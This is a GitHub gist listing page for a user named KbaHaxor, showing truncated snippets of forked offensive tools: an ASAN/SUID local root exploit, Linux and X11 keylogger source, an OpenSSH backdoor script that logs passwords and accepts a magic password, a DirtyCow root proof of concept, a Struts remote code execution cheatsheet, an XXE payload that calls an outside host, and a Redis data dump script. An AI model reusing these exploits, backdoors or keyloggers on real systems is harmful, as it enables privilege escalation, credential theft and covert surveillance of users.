Skip to content

Instantly share code, notes, and snippets.

View KbaHaxor's full-sized avatar
💭
hunting

Tuan Anh Nguyen KbaHaxor

💭
hunting
274 followers · 69 following
View GitHub Profile
@KbaHaxor
KbaHaxor / unsanitary.sh
Created August 24, 2016 03:56 — forked from 0x27/unsanitary.sh
#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
@KbaHaxor
KbaHaxor / gist:985725fe22ff9ca2a8f3b124ae34f9f5
Created September 22, 2016 08:33 — forked from bavardage/gist:939140
POC Linux Keylogger
#!/usr/bin/env python
import re, collections
from subprocess import *
def sanitize_keybinding(binding):
d = {'space': ' ',
'apostrophe': "'",
'BackSpace': ' (<-)',
'Return': '↵ \n',
@KbaHaxor
KbaHaxor / gist:a8e5495463f08567b66cc86c0a3d0036
Created September 22, 2016 08:34
XLib keylogger
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>
#include <signal.h>
#include <string.h>
#include <unistd.h> // for usleep() only
#include <sys/time.h>
#include <sys/types.h>
#include <time.h>
@KbaHaxor
KbaHaxor / gist:683574b97026ac74d9f962874cf6c2af
Created September 22, 2016 08:34 — forked from robertklep/gist:5124355
X11 keylogger
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <netdb.h>
#include <string.h>
#include <netinet/in.h>
#include <X11/X.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/StringDefs.h>
@KbaHaxor
KbaHaxor / openssh-autobackdoor.bash
Created October 5, 2016 08:53 — forked from eyecatchup/openssh-autobackdoor.bash
This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches but this script attempts to make the process version agnostic. Use at your own risk.
#!/bin/bash
# ============================================
# satyr's openssh autobackdooring doohicky v0.-1
# ImpendingSatyr@gmail.com
# ============================================
# USAGE:
# Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing).
# If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything
# (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc.
# [it'll install them via apt or yum, whichever is available]).
@KbaHaxor
KbaHaxor / get_ppid_and_name.c
Created October 6, 2016 07:16 — forked from fclairamb/get_ppid_and_name.c
posix: Get parent process id and name
#ifdef SHELL
gcc -Wall -Werror $0 && ./a.out
exit $?
#endif
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
@KbaHaxor
KbaHaxor / cowroot.c
Created October 21, 2016 15:04 — forked from rverton/cowroot.c
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@KbaHaxor
KbaHaxor / struts-cheatsheet.md
Created November 10, 2016 07:27 — forked from mgeeky/struts-cheatsheet.md
Apache Struts devMode Remote Code Execution cheatsheet

Apache Struts Remote Code Execution cheatsheet

Apacje Struts is a open source framework utilizing JavaEE web applications and encouraging to employ MVC (Model View Controller) architecture. When having the application developed in so-called devMode as set in the struts.xml file:

<constant name="struts.devMode" value="true" />

Then the middleware will be handling additional parameters passed to every function invocation.

Testing for Struts devMode enabled

@KbaHaxor
KbaHaxor / XXE_payloads
Created December 19, 2016 08:42 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@KbaHaxor
KbaHaxor / redis_dump.js
Created December 19, 2016 10:10 — forked from staaldraad/redis_dump.js
Dump data from open Redis instance
/*
Dump data from open Redis instance.
Usage: node redis_dump.js -h 10.10.0.1
node redis_dump.js -n 10 #dumps the first 10 keys from the instance
node redis_dump.js -k keyname #dump the value of a specific key
Author: etienne@sensepost.com
Version: 1.0 12 February 2015
*/
var redis = require("redis")